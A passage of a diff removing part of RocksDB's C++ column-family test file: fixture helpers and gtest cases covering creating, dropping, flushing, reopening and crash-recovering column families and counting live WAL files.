-      // Ugh.  Random seed of 0 used to produce no entropy.  This code
-      // preserves the implementation that was in place when all of the
-      // magic values in this file were picked.
-      *storage = std::string(kValueSize, ' ');
-      return Slice(*storage);
-    } else {
-      Random r(k);
-      return test::RandomString(&r, kValueSize, storage);
-    }
-  }
-
-  void Build(int base, int n, int flush_every = 0) {
-    std::string key_space, value_space;
-    WriteBatch batch;
-
-    for (int i = 0; i < n; i++) {
-      if (flush_every != 0 && i != 0 && i % flush_every == 0) {
-        DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-        dbi->TEST_FlushMemTable();
-      }
-
-      int keyi = base + i;
-      Slice key(DBTestBase::Key(keyi));
-
-      batch.Clear();
-      batch.Put(handles_[0], key, Value(keyi, &value_space));
-      batch.Put(handles_[1], key, Value(keyi, &value_space));
-      batch.Put(handles_[2], key, Value(keyi, &value_space));
-      ASSERT_OK(db_->Write(WriteOptions(), &batch));
-    }
-  }
-
-  void CheckMissed() {
-    uint64_t next_expected = 0;
-    uint64_t missed = 0;
-    int bad_keys = 0;
-    int bad_values = 0;
-    int correct = 0;
-    std::string value_space;
-    for (int cf = 0; cf < 3; cf++) {
-      next_expected = 0;
-      Iterator* iter = db_->NewIterator(ReadOptions(false, true), handles_[cf]);
-      for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-        uint64_t key;
-        Slice in(iter->key());
-        in.remove_prefix(3);
-        if (!ConsumeDecimalNumber(&in, &key) || !in.empty() ||
-            key < next_expected) {
-          bad_keys++;
-          continue;
-        }
-        missed += (key - next_expected);
-        next_expected = key + 1;
-        if (iter->value() != Value(static_cast<int>(key), &value_space)) {
-          bad_values++;
-        } else {
-          correct++;
-        }
-      }
-      delete iter;
-    }
-
-    ASSERT_EQ(0, bad_keys);
-    ASSERT_EQ(0, bad_values);
-    ASSERT_EQ(0, missed);
-    (void)correct;
-  }
-
-  void Close() {
-    for (auto h : handles_) {
-      if (h) {
-        db_->DestroyColumnFamilyHandle(h);
-      }
-    }
-    handles_.clear();
-    names_.clear();
-    delete db_;
-    db_ = nullptr;
-  }
-
-  Status TryOpen(std::vector<std::string> cf,
-                 std::vector<ColumnFamilyOptions> options = {}) {
-    std::vector<ColumnFamilyDescriptor> column_families;
-    names_.clear();
-    for (size_t i = 0; i < cf.size(); ++i) {
-      column_families.push_back(ColumnFamilyDescriptor(
-          cf[i], options.size() == 0 ? column_family_options_ : options[i]));
-      names_.push_back(cf[i]);
-    }
-    return DB::Open(db_options_, dbname_, column_families, &handles_, &db_);
-  }
-
-  Status OpenReadOnly(std::vector<std::string> cf,
-                         std::vector<ColumnFamilyOptions> options = {}) {
-    std::vector<ColumnFamilyDescriptor> column_families;
-    names_.clear();
-    for (size_t i = 0; i < cf.size(); ++i) {
-      column_families.push_back(ColumnFamilyDescriptor(
-          cf[i], options.size() == 0 ? column_family_options_ : options[i]));
-      names_.push_back(cf[i]);
-    }
-    return DB::OpenForReadOnly(db_options_, dbname_, column_families, &handles_,
-                               &db_);
-  }
-
-#ifndef ROCKSDB_LITE  // ReadOnlyDB is not supported
-  void AssertOpenReadOnly(std::vector<std::string> cf,
-                    std::vector<ColumnFamilyOptions> options = {}) {
-    ASSERT_OK(OpenReadOnly(cf, options));
-  }
-#endif  // !ROCKSDB_LITE
-
-
-  void Open(std::vector<std::string> cf,
-            std::vector<ColumnFamilyOptions> options = {}) {
-    ASSERT_OK(TryOpen(cf, options));
-  }
-
-  void Open() {
-    Open({"default"});
-  }
-
-  DBImpl* dbfull() { return reinterpret_cast<DBImpl*>(db_); }
-
-  int GetProperty(int cf, std::string property) {
-    std::string value;
-    EXPECT_TRUE(dbfull()->GetProperty(handles_[cf], property, &value));
-#ifndef CYGWIN
-    return std::stoi(value);
-#else
-    return std::strtol(value.c_str(), 0 /* off */, 10 /* base */);
-#endif
-  }
-
-  bool IsDbWriteStopped() {
-#ifndef ROCKSDB_LITE
-    uint64_t v;
-    EXPECT_TRUE(dbfull()->GetIntProperty("rocksdb.is-write-stopped", &v));
-    return (v == 1);
-#else
-    return dbfull()->TEST_write_controler().IsStopped();
-#endif  // !ROCKSDB_LITE
-  }
-
-  uint64_t GetDbDelayedWriteRate() {
-#ifndef ROCKSDB_LITE
-    uint64_t v;
-    EXPECT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.actual-delayed-write-rate", &v));
-    return v;
-#else
-    if (!dbfull()->TEST_write_controler().NeedsDelay()) {
-      return 0;
-    }
-    return dbfull()->TEST_write_controler().delayed_write_rate();
-#endif  // !ROCKSDB_LITE
-  }
-
-  void Destroy() {
-    Close();
-    ASSERT_OK(DestroyDB(dbname_, Options(db_options_, column_family_options_)));
-  }
-
-  void CreateColumnFamilies(
-      const std::vector<std::string>& cfs,
-      const std::vector<ColumnFamilyOptions> options = {}) {
-    int cfi = static_cast<int>(handles_.size());
-    handles_.resize(cfi + cfs.size());
-    names_.resize(cfi + cfs.size());
-    for (size_t i = 0; i < cfs.size(); ++i) {
-      const auto& current_cf_opt =
-          options.size() == 0 ? column_family_options_ : options[i];
-      ASSERT_OK(
-          db_->CreateColumnFamily(current_cf_opt, cfs[i], &handles_[cfi]));
-      names_[cfi] = cfs[i];
-
-#ifndef ROCKSDB_LITE  // RocksDBLite does not support GetDescriptor
-      // Verify the CF options of the returned CF handle.
-      ColumnFamilyDescriptor desc;
-      ASSERT_OK(handles_[cfi]->GetDescriptor(&desc));
-      RocksDBOptionsParser::VerifyCFOptions(desc.options, current_cf_opt);
-#endif  // !ROCKSDB_LITE
-      cfi++;
-    }
-  }
-
-  void Reopen(const std::vector<ColumnFamilyOptions> options = {}) {
-    std::vector<std::string> names;
-    for (auto name : names_) {
-      if (name != "") {
-        names.push_back(name);
-      }
-    }
-    Close();
-    assert(options.size() == 0 || names.size() == options.size());
-    Open(names, options);
-  }
-
-  void CreateColumnFamiliesAndReopen(const std::vector<std::string>& cfs) {
-    CreateColumnFamilies(cfs);
-    Reopen();
-  }
-
-  void DropColumnFamilies(const std::vector<int>& cfs) {
-    for (auto cf : cfs) {
-      ASSERT_OK(db_->DropColumnFamily(handles_[cf]));
-      db_->DestroyColumnFamilyHandle(handles_[cf]);
-      handles_[cf] = nullptr;
-      names_[cf] = "";
-    }
-  }
-
-  void PutRandomData(int cf, int num, int key_value_size, bool save = false) {
-    for (int i = 0; i < num; ++i) {
-      // 10 bytes for key, rest is value
-      if (!save) {
-        ASSERT_OK(Put(cf, test::RandomKey(&rnd_, 11),
-                      RandomString(&rnd_, key_value_size - 10)));
-      } else {
-        std::string key = test::RandomKey(&rnd_, 11);
-        keys_.insert(key);
-        ASSERT_OK(Put(cf, key, RandomString(&rnd_, key_value_size - 10)));
-      }
-    }
-    db_->FlushWAL(false);
-  }
-
-#ifndef ROCKSDB_LITE  // TEST functions in DB are not supported in lite
-  void WaitForFlush(int cf) {
-    ASSERT_OK(dbfull()->TEST_WaitForFlushMemTable(handles_[cf]));
-  }
-
-  void WaitForCompaction() {
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  }
-
-  uint64_t MaxTotalInMemoryState() {
-    return dbfull()->TEST_MaxTotalInMemoryState();
-  }
-
-  void AssertMaxTotalInMemoryState(uint64_t value) {
-    ASSERT_EQ(value, MaxTotalInMemoryState());
-  }
-#endif  // !ROCKSDB_LITE
-
-  Status Put(int cf, const std::string& key, const std::string& value) {
-    return db_->Put(WriteOptions(), handles_[cf], Slice(key), Slice(value));
-  }
-  Status Merge(int cf, const std::string& key, const std::string& value) {
-    return db_->Merge(WriteOptions(), handles_[cf], Slice(key), Slice(value));
-  }
-  Status Flush(int cf) {
-    return db_->Flush(FlushOptions(), handles_[cf]);
-  }
-
-  std::string Get(int cf, const std::string& key) {
-    ReadOptions options;
-    options.verify_checksums = true;
-    std::string result;
-    Status s = db_->Get(options, handles_[cf], Slice(key), &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  void CompactAll(int cf) {
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), handles_[cf], nullptr,
-                                nullptr));
-  }
-
-  void Compact(int cf, const Slice& start, const Slice& limit) {
-    ASSERT_OK(
-        db_->CompactRange(CompactRangeOptions(), handles_[cf], &start, &limit));
-  }
-
-  int NumTableFilesAtLevel(int level, int cf) {
-    return GetProperty(cf,
-                       "rocksdb.num-files-at-level" + ToString(level));
-  }
-
-#ifndef ROCKSDB_LITE
-  // Return spread of files per level
-  std::string FilesPerLevel(int cf) {
-    std::string result;
-    int last_non_zero_offset = 0;
-    for (int level = 0; level < dbfull()->NumberLevels(handles_[cf]); level++) {
-      int f = NumTableFilesAtLevel(level, cf);
-      char buf[100];
-      snprintf(buf, sizeof(buf), "%s%d", (level ? "," : ""), f);
-      result += buf;
-      if (f > 0) {
-        last_non_zero_offset = static_cast<int>(result.size());
-      }
-    }
-    result.resize(last_non_zero_offset);
-    return result;
-  }
-#endif
-
-  void AssertFilesPerLevel(const std::string& value, int cf) {
-#ifndef ROCKSDB_LITE
-    ASSERT_EQ(value, FilesPerLevel(cf));
-#endif
-  }
-
-#ifndef ROCKSDB_LITE  // GetLiveFilesMetaData is not supported
-  int CountLiveFiles() {
-    std::vector<LiveFileMetaData> metadata;
-    db_->GetLiveFilesMetaData(&metadata);
-    return static_cast<int>(metadata.size());
-  }
-#endif  // !ROCKSDB_LITE
-
-  void AssertCountLiveFiles(int expected_value) {
-#ifndef ROCKSDB_LITE
-    ASSERT_EQ(expected_value, CountLiveFiles());
-#endif
-  }
-
-  // Do n memtable flushes, each of which produces an sstable
-  // covering the range [small,large].
-  void MakeTables(int cf, int n, const std::string& small,
-                  const std::string& large) {
-    for (int i = 0; i < n; i++) {
-      ASSERT_OK(Put(cf, small, "begin"));
-      ASSERT_OK(Put(cf, large, "end"));
-      ASSERT_OK(db_->Flush(FlushOptions(), handles_[cf]));
-    }
-  }
-
-#ifndef ROCKSDB_LITE  // GetSortedWalFiles is not supported
-  int CountLiveLogFiles() {
-    int micros_wait_for_log_deletion = 20000;
-    env_->SleepForMicroseconds(micros_wait_for_log_deletion);
-    int ret = 0;
-    VectorLogPtr wal_files;
-    Status s;
-    // GetSortedWalFiles is a flakey function -- it gets all the wal_dir
-    // children files and then later checks for their existence. if some of the
-    // log files doesn't exist anymore, it reports an error. it does all of this
-    // without DB mutex held, so if a background process deletes the log file
-    // while the function is being executed, it returns an error. We retry the
-    // function 10 times to avoid the error failing the test
-    for (int retries = 0; retries < 10; ++retries) {
-      wal_files.clear();
-      s = db_->GetSortedWalFiles(wal_files);
-      if (s.ok()) {
-        break;
-      }
-    }
-    EXPECT_OK(s);
-    for (const auto& wal : wal_files) {
-      if (wal->Type() == kAliveLogFile) {
-        ++ret;
-      }
-    }
-    return ret;
-    return 0;
-  }
-#endif  // !ROCKSDB_LITE
-
-  void AssertCountLiveLogFiles(int value) {
-#ifndef ROCKSDB_LITE  // GetSortedWalFiles is not supported
-    ASSERT_EQ(value, CountLiveLogFiles());
-#endif  // !ROCKSDB_LITE
-  }
-
-  void AssertNumberOfImmutableMemtables(std::vector<int> num_per_cf) {
-    assert(num_per_cf.size() == handles_.size());
-
-#ifndef ROCKSDB_LITE  // GetProperty is not supported in lite
-    for (size_t i = 0; i < num_per_cf.size(); ++i) {
-      ASSERT_EQ(num_per_cf[i], GetProperty(static_cast<int>(i),
-                                           "rocksdb.num-immutable-mem-table"));
-    }
-#endif  // !ROCKSDB_LITE
-  }
-
-  void CopyFile(const std::string& source, const std::string& destination,
-                uint64_t size = 0) {
-    const EnvOptions soptions;
-    unique_ptr<SequentialFile> srcfile;
-    ASSERT_OK(env_->NewSequentialFile(source, &srcfile, soptions));
-    unique_ptr<WritableFile> destfile;
-    ASSERT_OK(env_->NewWritableFile(destination, &destfile, soptions));
-
-    if (size == 0) {
-      // default argument means copy everything
-      ASSERT_OK(env_->GetFileSize(source, &size));
-    }
-
-    char buffer[4096];
-    Slice slice;
-    while (size > 0) {
-      uint64_t one = std::min(uint64_t(sizeof(buffer)), size);
-      ASSERT_OK(srcfile->Read(one, &slice, buffer));
-      ASSERT_OK(destfile->Append(slice));
-      size -= slice.size();
-    }
-    ASSERT_OK(destfile->Close());
-  }
-
-  std::vector<ColumnFamilyHandle*> handles_;
-  std::vector<std::string> names_;
-  std::set<std::string> keys_;
-  ColumnFamilyOptions column_family_options_;
-  DBOptions db_options_;
-  std::string dbname_;
-  DB* db_ = nullptr;
-  EnvCounter* env_;
-  Random rnd_;
-};
-
-TEST_F(ColumnFamilyTest, DontReuseColumnFamilyID) {
-  for (int iter = 0; iter < 3; ++iter) {
-    Open();
-    CreateColumnFamilies({"one", "two", "three"});
-    for (size_t i = 0; i < handles_.size(); ++i) {
-      auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(handles_[i]);
-      ASSERT_EQ(i, cfh->GetID());
-    }
-    if (iter == 1) {
-      Reopen();
-    }
-    DropColumnFamilies({3});
-    Reopen();
-    if (iter == 2) {
-      // this tests if max_column_family is correctly persisted with
-      // WriteSnapshot()
-      Reopen();
-    }
-    CreateColumnFamilies({"three2"});
-    // ID 3 that was used for dropped column family "three" should not be reused
-    auto cfh3 = reinterpret_cast<ColumnFamilyHandleImpl*>(handles_[3]);
-    ASSERT_EQ(4U, cfh3->GetID());
-    Close();
-    Destroy();
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(ColumnFamilyTest, CreateCFRaceWithGetAggProperty) {
-  Open();
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::WriteOptionsFile:1",
-        "ColumnFamilyTest.CreateCFRaceWithGetAggProperty:1"},
-       {"ColumnFamilyTest.CreateCFRaceWithGetAggProperty:2",
-        "DBImpl::WriteOptionsFile:2"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread thread([&] { CreateColumnFamilies({"one"}); });
-
-  TEST_SYNC_POINT("ColumnFamilyTest.CreateCFRaceWithGetAggProperty:1");
-  uint64_t pv;
-  db_->GetAggregatedIntProperty(DB::Properties::kEstimateTableReadersMem, &pv);
-  TEST_SYNC_POINT("ColumnFamilyTest.CreateCFRaceWithGetAggProperty:2");
-
-  thread.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-#endif  // !ROCKSDB_LITE
-
-class FlushEmptyCFTestWithParam : public ColumnFamilyTest,
-                                  public testing::WithParamInterface<bool> {
- public:
-  FlushEmptyCFTestWithParam() { allow_2pc_ = GetParam(); }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  bool allow_2pc_;
-};
-
-TEST_P(FlushEmptyCFTestWithParam, FlushEmptyCFTest) {
-  std::unique_ptr<FaultInjectionTestEnv> fault_env(
-      new FaultInjectionTestEnv(env_));
-  db_options_.env = fault_env.get();
-  db_options_.allow_2pc = allow_2pc_;
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  // Generate log file A.
-  ASSERT_OK(Put(1, "foo", "v1"));  // seqID 1
-
-  Reopen();
-  // Log file A is not dropped after reopening because default column family's
-  // min log number is 0.
-  // It flushes to SST file X
-  ASSERT_OK(Put(1, "foo", "v1"));  // seqID 2
-  ASSERT_OK(Put(1, "bar", "v2"));  // seqID 3
-  // Current log file is file B now. While flushing, a new log file C is created
-  // and is set to current. Boths' min log number is set to file C in memory, so
-  // after flushing file B is deleted. At the same time, the min log number of
-  // default CF is not written to manifest. Log file A still remains.
-  // Flushed to SST file Y.
-  Flush(1);
-  Flush(0);
-  ASSERT_OK(Put(1, "bar", "v3"));  // seqID 4
-  ASSERT_OK(Put(1, "foo", "v4"));  // seqID 5
-  db_->FlushWAL(false);
-
-  // Preserve file system state up to here to simulate a crash condition.
-  fault_env->SetFilesystemActive(false);
-  std::vector<std::string> names;
-  for (auto name : names_) {
-    if (name != "") {
-      names.push_back(name);
-    }
-  }
-
-  Close();
-  fault_env->ResetState();
-
-  // Before opening, there are four files:
-  //   Log file A contains seqID 1
-  //   Log file C contains seqID 4, 5
-  //   SST file X contains seqID 1
-  //   SST file Y contains seqID 2, 3
-  // Min log number:
-  //   default CF: 0
-  //   CF one, two: C
-  // When opening the DB, all the seqID should be preserved.
-  Open(names, {});
-  ASSERT_EQ("v4", Get(1, "foo"));
-  ASSERT_EQ("v3", Get(1, "bar"));
-  Close();
-
-  db_options_.env = env_;
-}
-
-TEST_P(FlushEmptyCFTestWithParam, FlushEmptyCFTest2) {
-  std::unique_ptr<FaultInjectionTestEnv> fault_env(
-      new FaultInjectionTestEnv(env_));
-  db_options_.env = fault_env.get();
-  db_options_.allow_2pc = allow_2pc_;
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  // Generate log file A.
-  ASSERT_OK(Put(1, "foo", "v1"));  // seqID 1
-
-  Reopen();
-  // Log file A is not dropped after reopening because default column family's
-  // min log number is 0.
-  // It flushes to SST file X
-  ASSERT_OK(Put(1, "foo", "v1"));  // seqID 2
-  ASSERT_OK(Put(1, "bar", "v2"));  // seqID 3
-  // Current log file is file B now. While flushing, a new log file C is created
-  // and is set to current. Both CFs' min log number is set to file C so after
-  // flushing file B is deleted. Log file A still remains.
-  // Flushed to SST file Y.
-  Flush(1);
-  ASSERT_OK(Put(0, "bar", "v2"));  // seqID 4
-  ASSERT_OK(Put(2, "bar", "v2"));  // seqID 5
-  ASSERT_OK(Put(1, "bar", "v3"));  // seqID 6
-  // Flushing all column families. This forces all CFs' min log to current. This
-  // is written to the manifest file. Log file C is cleared.
-  Flush(0);
-  Flush(1);
-  Flush(2);
-  // Write to log file D
-  ASSERT_OK(Put(1, "bar", "v4"));  // seqID 7
-  ASSERT_OK(Put(1, "bar", "v5"));  // seqID 8
-  db_->FlushWAL(false);
-  // Preserve file system state up to here to simulate a crash condition.
-  fault_env->SetFilesystemActive(false);
-  std::vector<std::string> names;
-  for (auto name : names_) {
-    if (name != "") {
-      names.push_back(name);
-    }
-  }
-
-  Close();
-  fault_env->ResetState();
-  // Before opening, there are two logfiles:
-  //   Log file A contains seqID 1
-  //   Log file D contains seqID 7, 8
-  // Min log number:
-  //   default CF: D
-  //   CF one, two: D
-  // When opening the DB, log file D should be replayed using the seqID
-  // specified in the file.
-  Open(names, {});
-  ASSERT_EQ("v1", Get(1, "foo"));
-  ASSERT_EQ("v5", Get(1, "bar"));
-  Close();
-
-  db_options_.env = env_;
-}
-
-INSTANTIATE_TEST_CASE_P(FlushEmptyCFTestWithParam, FlushEmptyCFTestWithParam,
-                        ::testing::Bool());
-
-TEST_F(ColumnFamilyTest, AddDrop) {
-  Open();
-  CreateColumnFamilies({"one", "two", "three"});
-  ASSERT_EQ("NOT_FOUND", Get(1, "fodor"));
-  ASSERT_EQ("NOT_FOUND", Get(2, "fodor"));
-  DropColumnFamilies({2});
-  ASSERT_EQ("NOT_FOUND", Get(1, "fodor"));
-  CreateColumnFamilies({"four"});
-  ASSERT_EQ("NOT_FOUND", Get(3, "fodor"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_EQ("mirko", Get(1, "fodor"));
-  ASSERT_EQ("NOT_FOUND", Get(3, "fodor"));
-  Close();
-  ASSERT_TRUE(TryOpen({"default"}).IsInvalidArgument());
-  Open({"default", "one", "three", "four"});
-  DropColumnFamilies({1});
-  Reopen();
-  Close();
-
-  std::vector<std::string> families;
-  ASSERT_OK(DB::ListColumnFamilies(db_options_, dbname_, &families));
-  std::sort(families.begin(), families.end());
-  ASSERT_TRUE(families ==
-              std::vector<std::string>({"default", "four", "three"}));
-}
-
-TEST_F(ColumnFamilyTest, BulkAddDrop) {
-  constexpr int kNumCF = 1000;
-  ColumnFamilyOptions cf_options;
-  WriteOptions write_options;
-  Open();
-  std::vector<std::string> cf_names;
-  std::vector<ColumnFamilyHandle*> cf_handles;
-  for (int i = 1; i <= kNumCF; i++) {
-    cf_names.push_back("cf1-" + ToString(i));
-  }
-  ASSERT_OK(db_->CreateColumnFamilies(cf_options, cf_names, &cf_handles));
-  for (int i = 1; i <= kNumCF; i++) {
-    ASSERT_OK(db_->Put(write_options, cf_handles[i - 1], "foo", "bar"));
-  }
-  ASSERT_OK(db_->DropColumnFamilies(cf_handles));
-  std::vector<ColumnFamilyDescriptor> cf_descriptors;
-  for (auto* handle : cf_handles) {
-    delete handle;
-  }
-  cf_handles.clear();
-  for (int i = 1; i <= kNumCF; i++) {
-    cf_descriptors.emplace_back("cf2-" + ToString(i), ColumnFamilyOptions());
-  }
-  ASSERT_OK(db_->CreateColumnFamilies(cf_descriptors, &cf_handles));
-  for (int i = 1; i <= kNumCF; i++) {
-    ASSERT_OK(db_->Put(write_options, cf_handles[i - 1], "foo", "bar"));
-  }
-  ASSERT_OK(db_->DropColumnFamilies(cf_handles));
-  for (auto* handle : cf_handles) {
-    delete handle;
-  }
-  Close();
-  std::vector<std::string> families;
-  ASSERT_OK(DB::ListColumnFamilies(db_options_, dbname_, &families));
-  std::sort(families.begin(), families.end());
-  ASSERT_TRUE(families == std::vector<std::string>({"default"}));
-}
-
-TEST_F(ColumnFamilyTest, DropTest) {
-  // first iteration - dont reopen DB before dropping
-  // second iteration - reopen DB before dropping
-  for (int iter = 0; iter < 2; ++iter) {
-    Open({"default"});
-    CreateColumnFamiliesAndReopen({"pikachu"});
-    for (int i = 0; i < 100; ++i) {
-      ASSERT_OK(Put(1, ToString(i), "bar" + ToString(i)));
-    }
-    ASSERT_OK(Flush(1));
-
-    if (iter == 1) {
-      Reopen();
-    }
-    ASSERT_EQ("bar1", Get(1, "1"));
-
-    AssertCountLiveFiles(1);
-    DropColumnFamilies({1});
-    // make sure that all files are deleted when we drop the column family
-    AssertCountLiveFiles(0);
-    Destroy();
-  }
-}
-
-TEST_F(ColumnFamilyTest, WriteBatchFailure) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two"});
-  WriteBatch batch;
-  batch.Put(handles_[0], Slice("existing"), Slice("column-family"));
-  batch.Put(handles_[1], Slice("non-existing"), Slice("column-family"));
-  ASSERT_OK(db_->Write(WriteOptions(), &batch));
-  DropColumnFamilies({1});
-  WriteOptions woptions_ignore_missing_cf;
-  woptions_ignore_missing_cf.ignore_missing_column_families = true;
-  batch.Put(handles_[0], Slice("still here"), Slice("column-family"));
-  ASSERT_OK(db_->Write(woptions_ignore_missing_cf, &batch));
-  ASSERT_EQ("column-family", Get(0, "still here"));
-  Status s = db_->Write(WriteOptions(), &batch);
-  ASSERT_TRUE(s.IsInvalidArgument());
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, ReadWrite) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two"});
-  ASSERT_OK(Put(0, "foo", "v1"));
-  ASSERT_OK(Put(0, "bar", "v2"));
-  ASSERT_OK(Put(1, "mirko", "v3"));
-  ASSERT_OK(Put(0, "foo", "v2"));
-  ASSERT_OK(Put(2, "fodor", "v5"));
-
-  for (int iter = 0; iter <= 3; ++iter) {
-    ASSERT_EQ("v2", Get(0, "foo"));
-    ASSERT_EQ("v2", Get(0, "bar"));
-    ASSERT_EQ("v3", Get(1, "mirko"));
-    ASSERT_EQ("v5", Get(2, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(0, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(2, "foo"));
-    if (iter <= 1) {
-      Reopen();
-    }
-  }
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, IgnoreRecoveredLog) {
-  std::string backup_logs = dbname_ + "/backup_logs";
-
-  // delete old files in backup_logs directory
-  ASSERT_OK(env_->CreateDirIfMissing(dbname_));
-  ASSERT_OK(env_->CreateDirIfMissing(backup_logs));
-  std::vector<std::string> old_files;
-  env_->GetChildren(backup_logs, &old_files);
-  for (auto& file : old_files) {
-    if (file != "." && file != "..") {
-      env_->DeleteFile(backup_logs + "/" + file);
-    }
-  }
-
-  column_family_options_.merge_operator =
-      MergeOperators::CreateUInt64AddOperator();
-  db_options_.wal_dir = dbname_ + "/logs";
-  Destroy();
-  Open();
-  CreateColumnFamilies({"cf1", "cf2"});
-
-  // fill up the DB
-  std::string one, two, three;
-  PutFixed64(&one, 1);
-  PutFixed64(&two, 2);
-  PutFixed64(&three, 3);
-  ASSERT_OK(Merge(0, "foo", one));
-  ASSERT_OK(Merge(1, "mirko", one));
-  ASSERT_OK(Merge(0, "foo", one));
-  ASSERT_OK(Merge(2, "bla", one));
-  ASSERT_OK(Merge(2, "fodor", one));
-  ASSERT_OK(Merge(0, "bar", one));
-  ASSERT_OK(Merge(2, "bla", one));
-  ASSERT_OK(Merge(1, "mirko", two));
-  ASSERT_OK(Merge(1, "franjo", one));
-
-  // copy the logs to backup
-  std::vector<std::string> logs;
-  env_->GetChildren(db_options_.wal_dir, &logs);
-  for (auto& log : logs) {
-    if (log != ".." && log != ".") {
-      CopyFile(db_options_.wal_dir + "/" + log, backup_logs + "/" + log);
-    }
-  }
-
-  // recover the DB
-  Close();
-
-  // 1. check consistency
-  // 2. copy the logs from backup back to WAL dir. if the recovery happens
-  // again on the same log files, this should lead to incorrect results
-  // due to applying merge operator twice
-  // 3. check consistency
-  for (int iter = 0; iter < 2; ++iter) {
-    // assert consistency
-    Open({"default", "cf1", "cf2"});
-    ASSERT_EQ(two, Get(0, "foo"));
-    ASSERT_EQ(one, Get(0, "bar"));
-    ASSERT_EQ(three, Get(1, "mirko"));
-    ASSERT_EQ(one, Get(1, "franjo"));
-    ASSERT_EQ(one, Get(2, "fodor"));
-    ASSERT_EQ(two, Get(2, "bla"));
-    Close();
-
-    if (iter == 0) {
-      // copy the logs from backup back to wal dir
-      for (auto& log : logs) {
-        if (log != ".." && log != ".") {
-          CopyFile(backup_logs + "/" + log, db_options_.wal_dir + "/" + log);
-        }
-      }
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE  // TEST functions used are not supported
-TEST_F(ColumnFamilyTest, FlushTest) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two"});
-  ASSERT_OK(Put(0, "foo", "v1"));
-  ASSERT_OK(Put(0, "bar", "v2"));
-  ASSERT_OK(Put(1, "mirko", "v3"));
-  ASSERT_OK(Put(0, "foo", "v2"));
-  ASSERT_OK(Put(2, "fodor", "v5"));
-
-  for (int j = 0; j < 2; j++) {
-    ReadOptions ro;
-    std::vector<Iterator*> iterators;
-    // Hold super version.
-    if (j == 0) {
-      ASSERT_OK(db_->NewIterators(ro, handles_, &iterators));
-    }
-
-    for (int i = 0; i < 3; ++i) {
-      uint64_t max_total_in_memory_state =
-          MaxTotalInMemoryState();
-      Flush(i);
-      AssertMaxTotalInMemoryState(max_total_in_memory_state);
-    }
-    ASSERT_OK(Put(1, "foofoo", "bar"));
-    ASSERT_OK(Put(0, "foofoo", "bar"));
-
-    for (auto* it : iterators) {
-      delete it;
-    }
-  }
-  Reopen();
-
-  for (int iter = 0; iter <= 2; ++iter) {
-    ASSERT_EQ("v2", Get(0, "foo"));
-    ASSERT_EQ("v2", Get(0, "bar"));
-    ASSERT_EQ("v3", Get(1, "mirko"));
-    ASSERT_EQ("v5", Get(2, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(0, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "fodor"));
-    ASSERT_EQ("NOT_FOUND", Get(2, "foo"));
-    if (iter <= 1) {
-      Reopen();
-    }
-  }
-  Close();
-}
-
-// Makes sure that obsolete log files get deleted
-TEST_F(ColumnFamilyTest, LogDeletionTest) {
-  db_options_.max_total_wal_size = std::numeric_limits<uint64_t>::max();
-  column_family_options_.arena_block_size = 4 * 1024;
-  column_family_options_.write_buffer_size = 100000;  // 100KB
-  Open();
-  CreateColumnFamilies({"one", "two", "three", "four"});
-  // Each bracket is one log file. if number is in (), it means
-  // we don't need it anymore (it's been flushed)
-  // []
-  AssertCountLiveLogFiles(0);
-  PutRandomData(0, 1, 100);
-  // [0]
-  PutRandomData(1, 1, 100);
-  // [0, 1]
-  PutRandomData(1, 1000, 100);
-  WaitForFlush(1);
-  // [0, (1)] [1]
-  AssertCountLiveLogFiles(2);
-  PutRandomData(0, 1, 100);
-  // [0, (1)] [0, 1]
-  AssertCountLiveLogFiles(2);
-  PutRandomData(2, 1, 100);
-  // [0, (1)] [0, 1, 2]
-  PutRandomData(2, 1000, 100);
-  WaitForFlush(2);
-  // [0, (1)] [0, 1, (2)] [2]
-  AssertCountLiveLogFiles(3);
-  PutRandomData(2, 1000, 100);
-  WaitForFlush(2);
-  // [0, (1)] [0, 1, (2)] [(2)] [2]
-  AssertCountLiveLogFiles(4);
-  PutRandomData(3, 1, 100);
-  // [0, (1)] [0, 1, (2)] [(2)] [2, 3]
-  PutRandomData(1, 1, 100);
-  // [0, (1)] [0, 1, (2)] [(2)] [1, 2, 3]
-  AssertCountLiveLogFiles(4);
-  PutRandomData(1, 1000, 100);
-  WaitForFlush(1);
-  // [0, (1)] [0, (1), (2)] [(2)] [(1), 2, 3] [1]
-  AssertCountLiveLogFiles(5);
-  PutRandomData(0, 1000, 100);
-  WaitForFlush(0);
-  // [(0), (1)] [(0), (1), (2)] [(2)] [(1), 2, 3] [1, (0)] [0]
-  // delete obsolete logs -->
-  // [(1), 2, 3] [1, (0)] [0]
-  AssertCountLiveLogFiles(3);
-  PutRandomData(0, 1000, 100);
-  WaitForFlush(0);
-  // [(1), 2, 3] [1, (0)], [(0)] [0]
-  AssertCountLiveLogFiles(4);
-  PutRandomData(1, 1000, 100);
-  WaitForFlush(1);
-  // [(1), 2, 3] [(1), (0)] [(0)] [0, (1)] [1]
-  AssertCountLiveLogFiles(5);
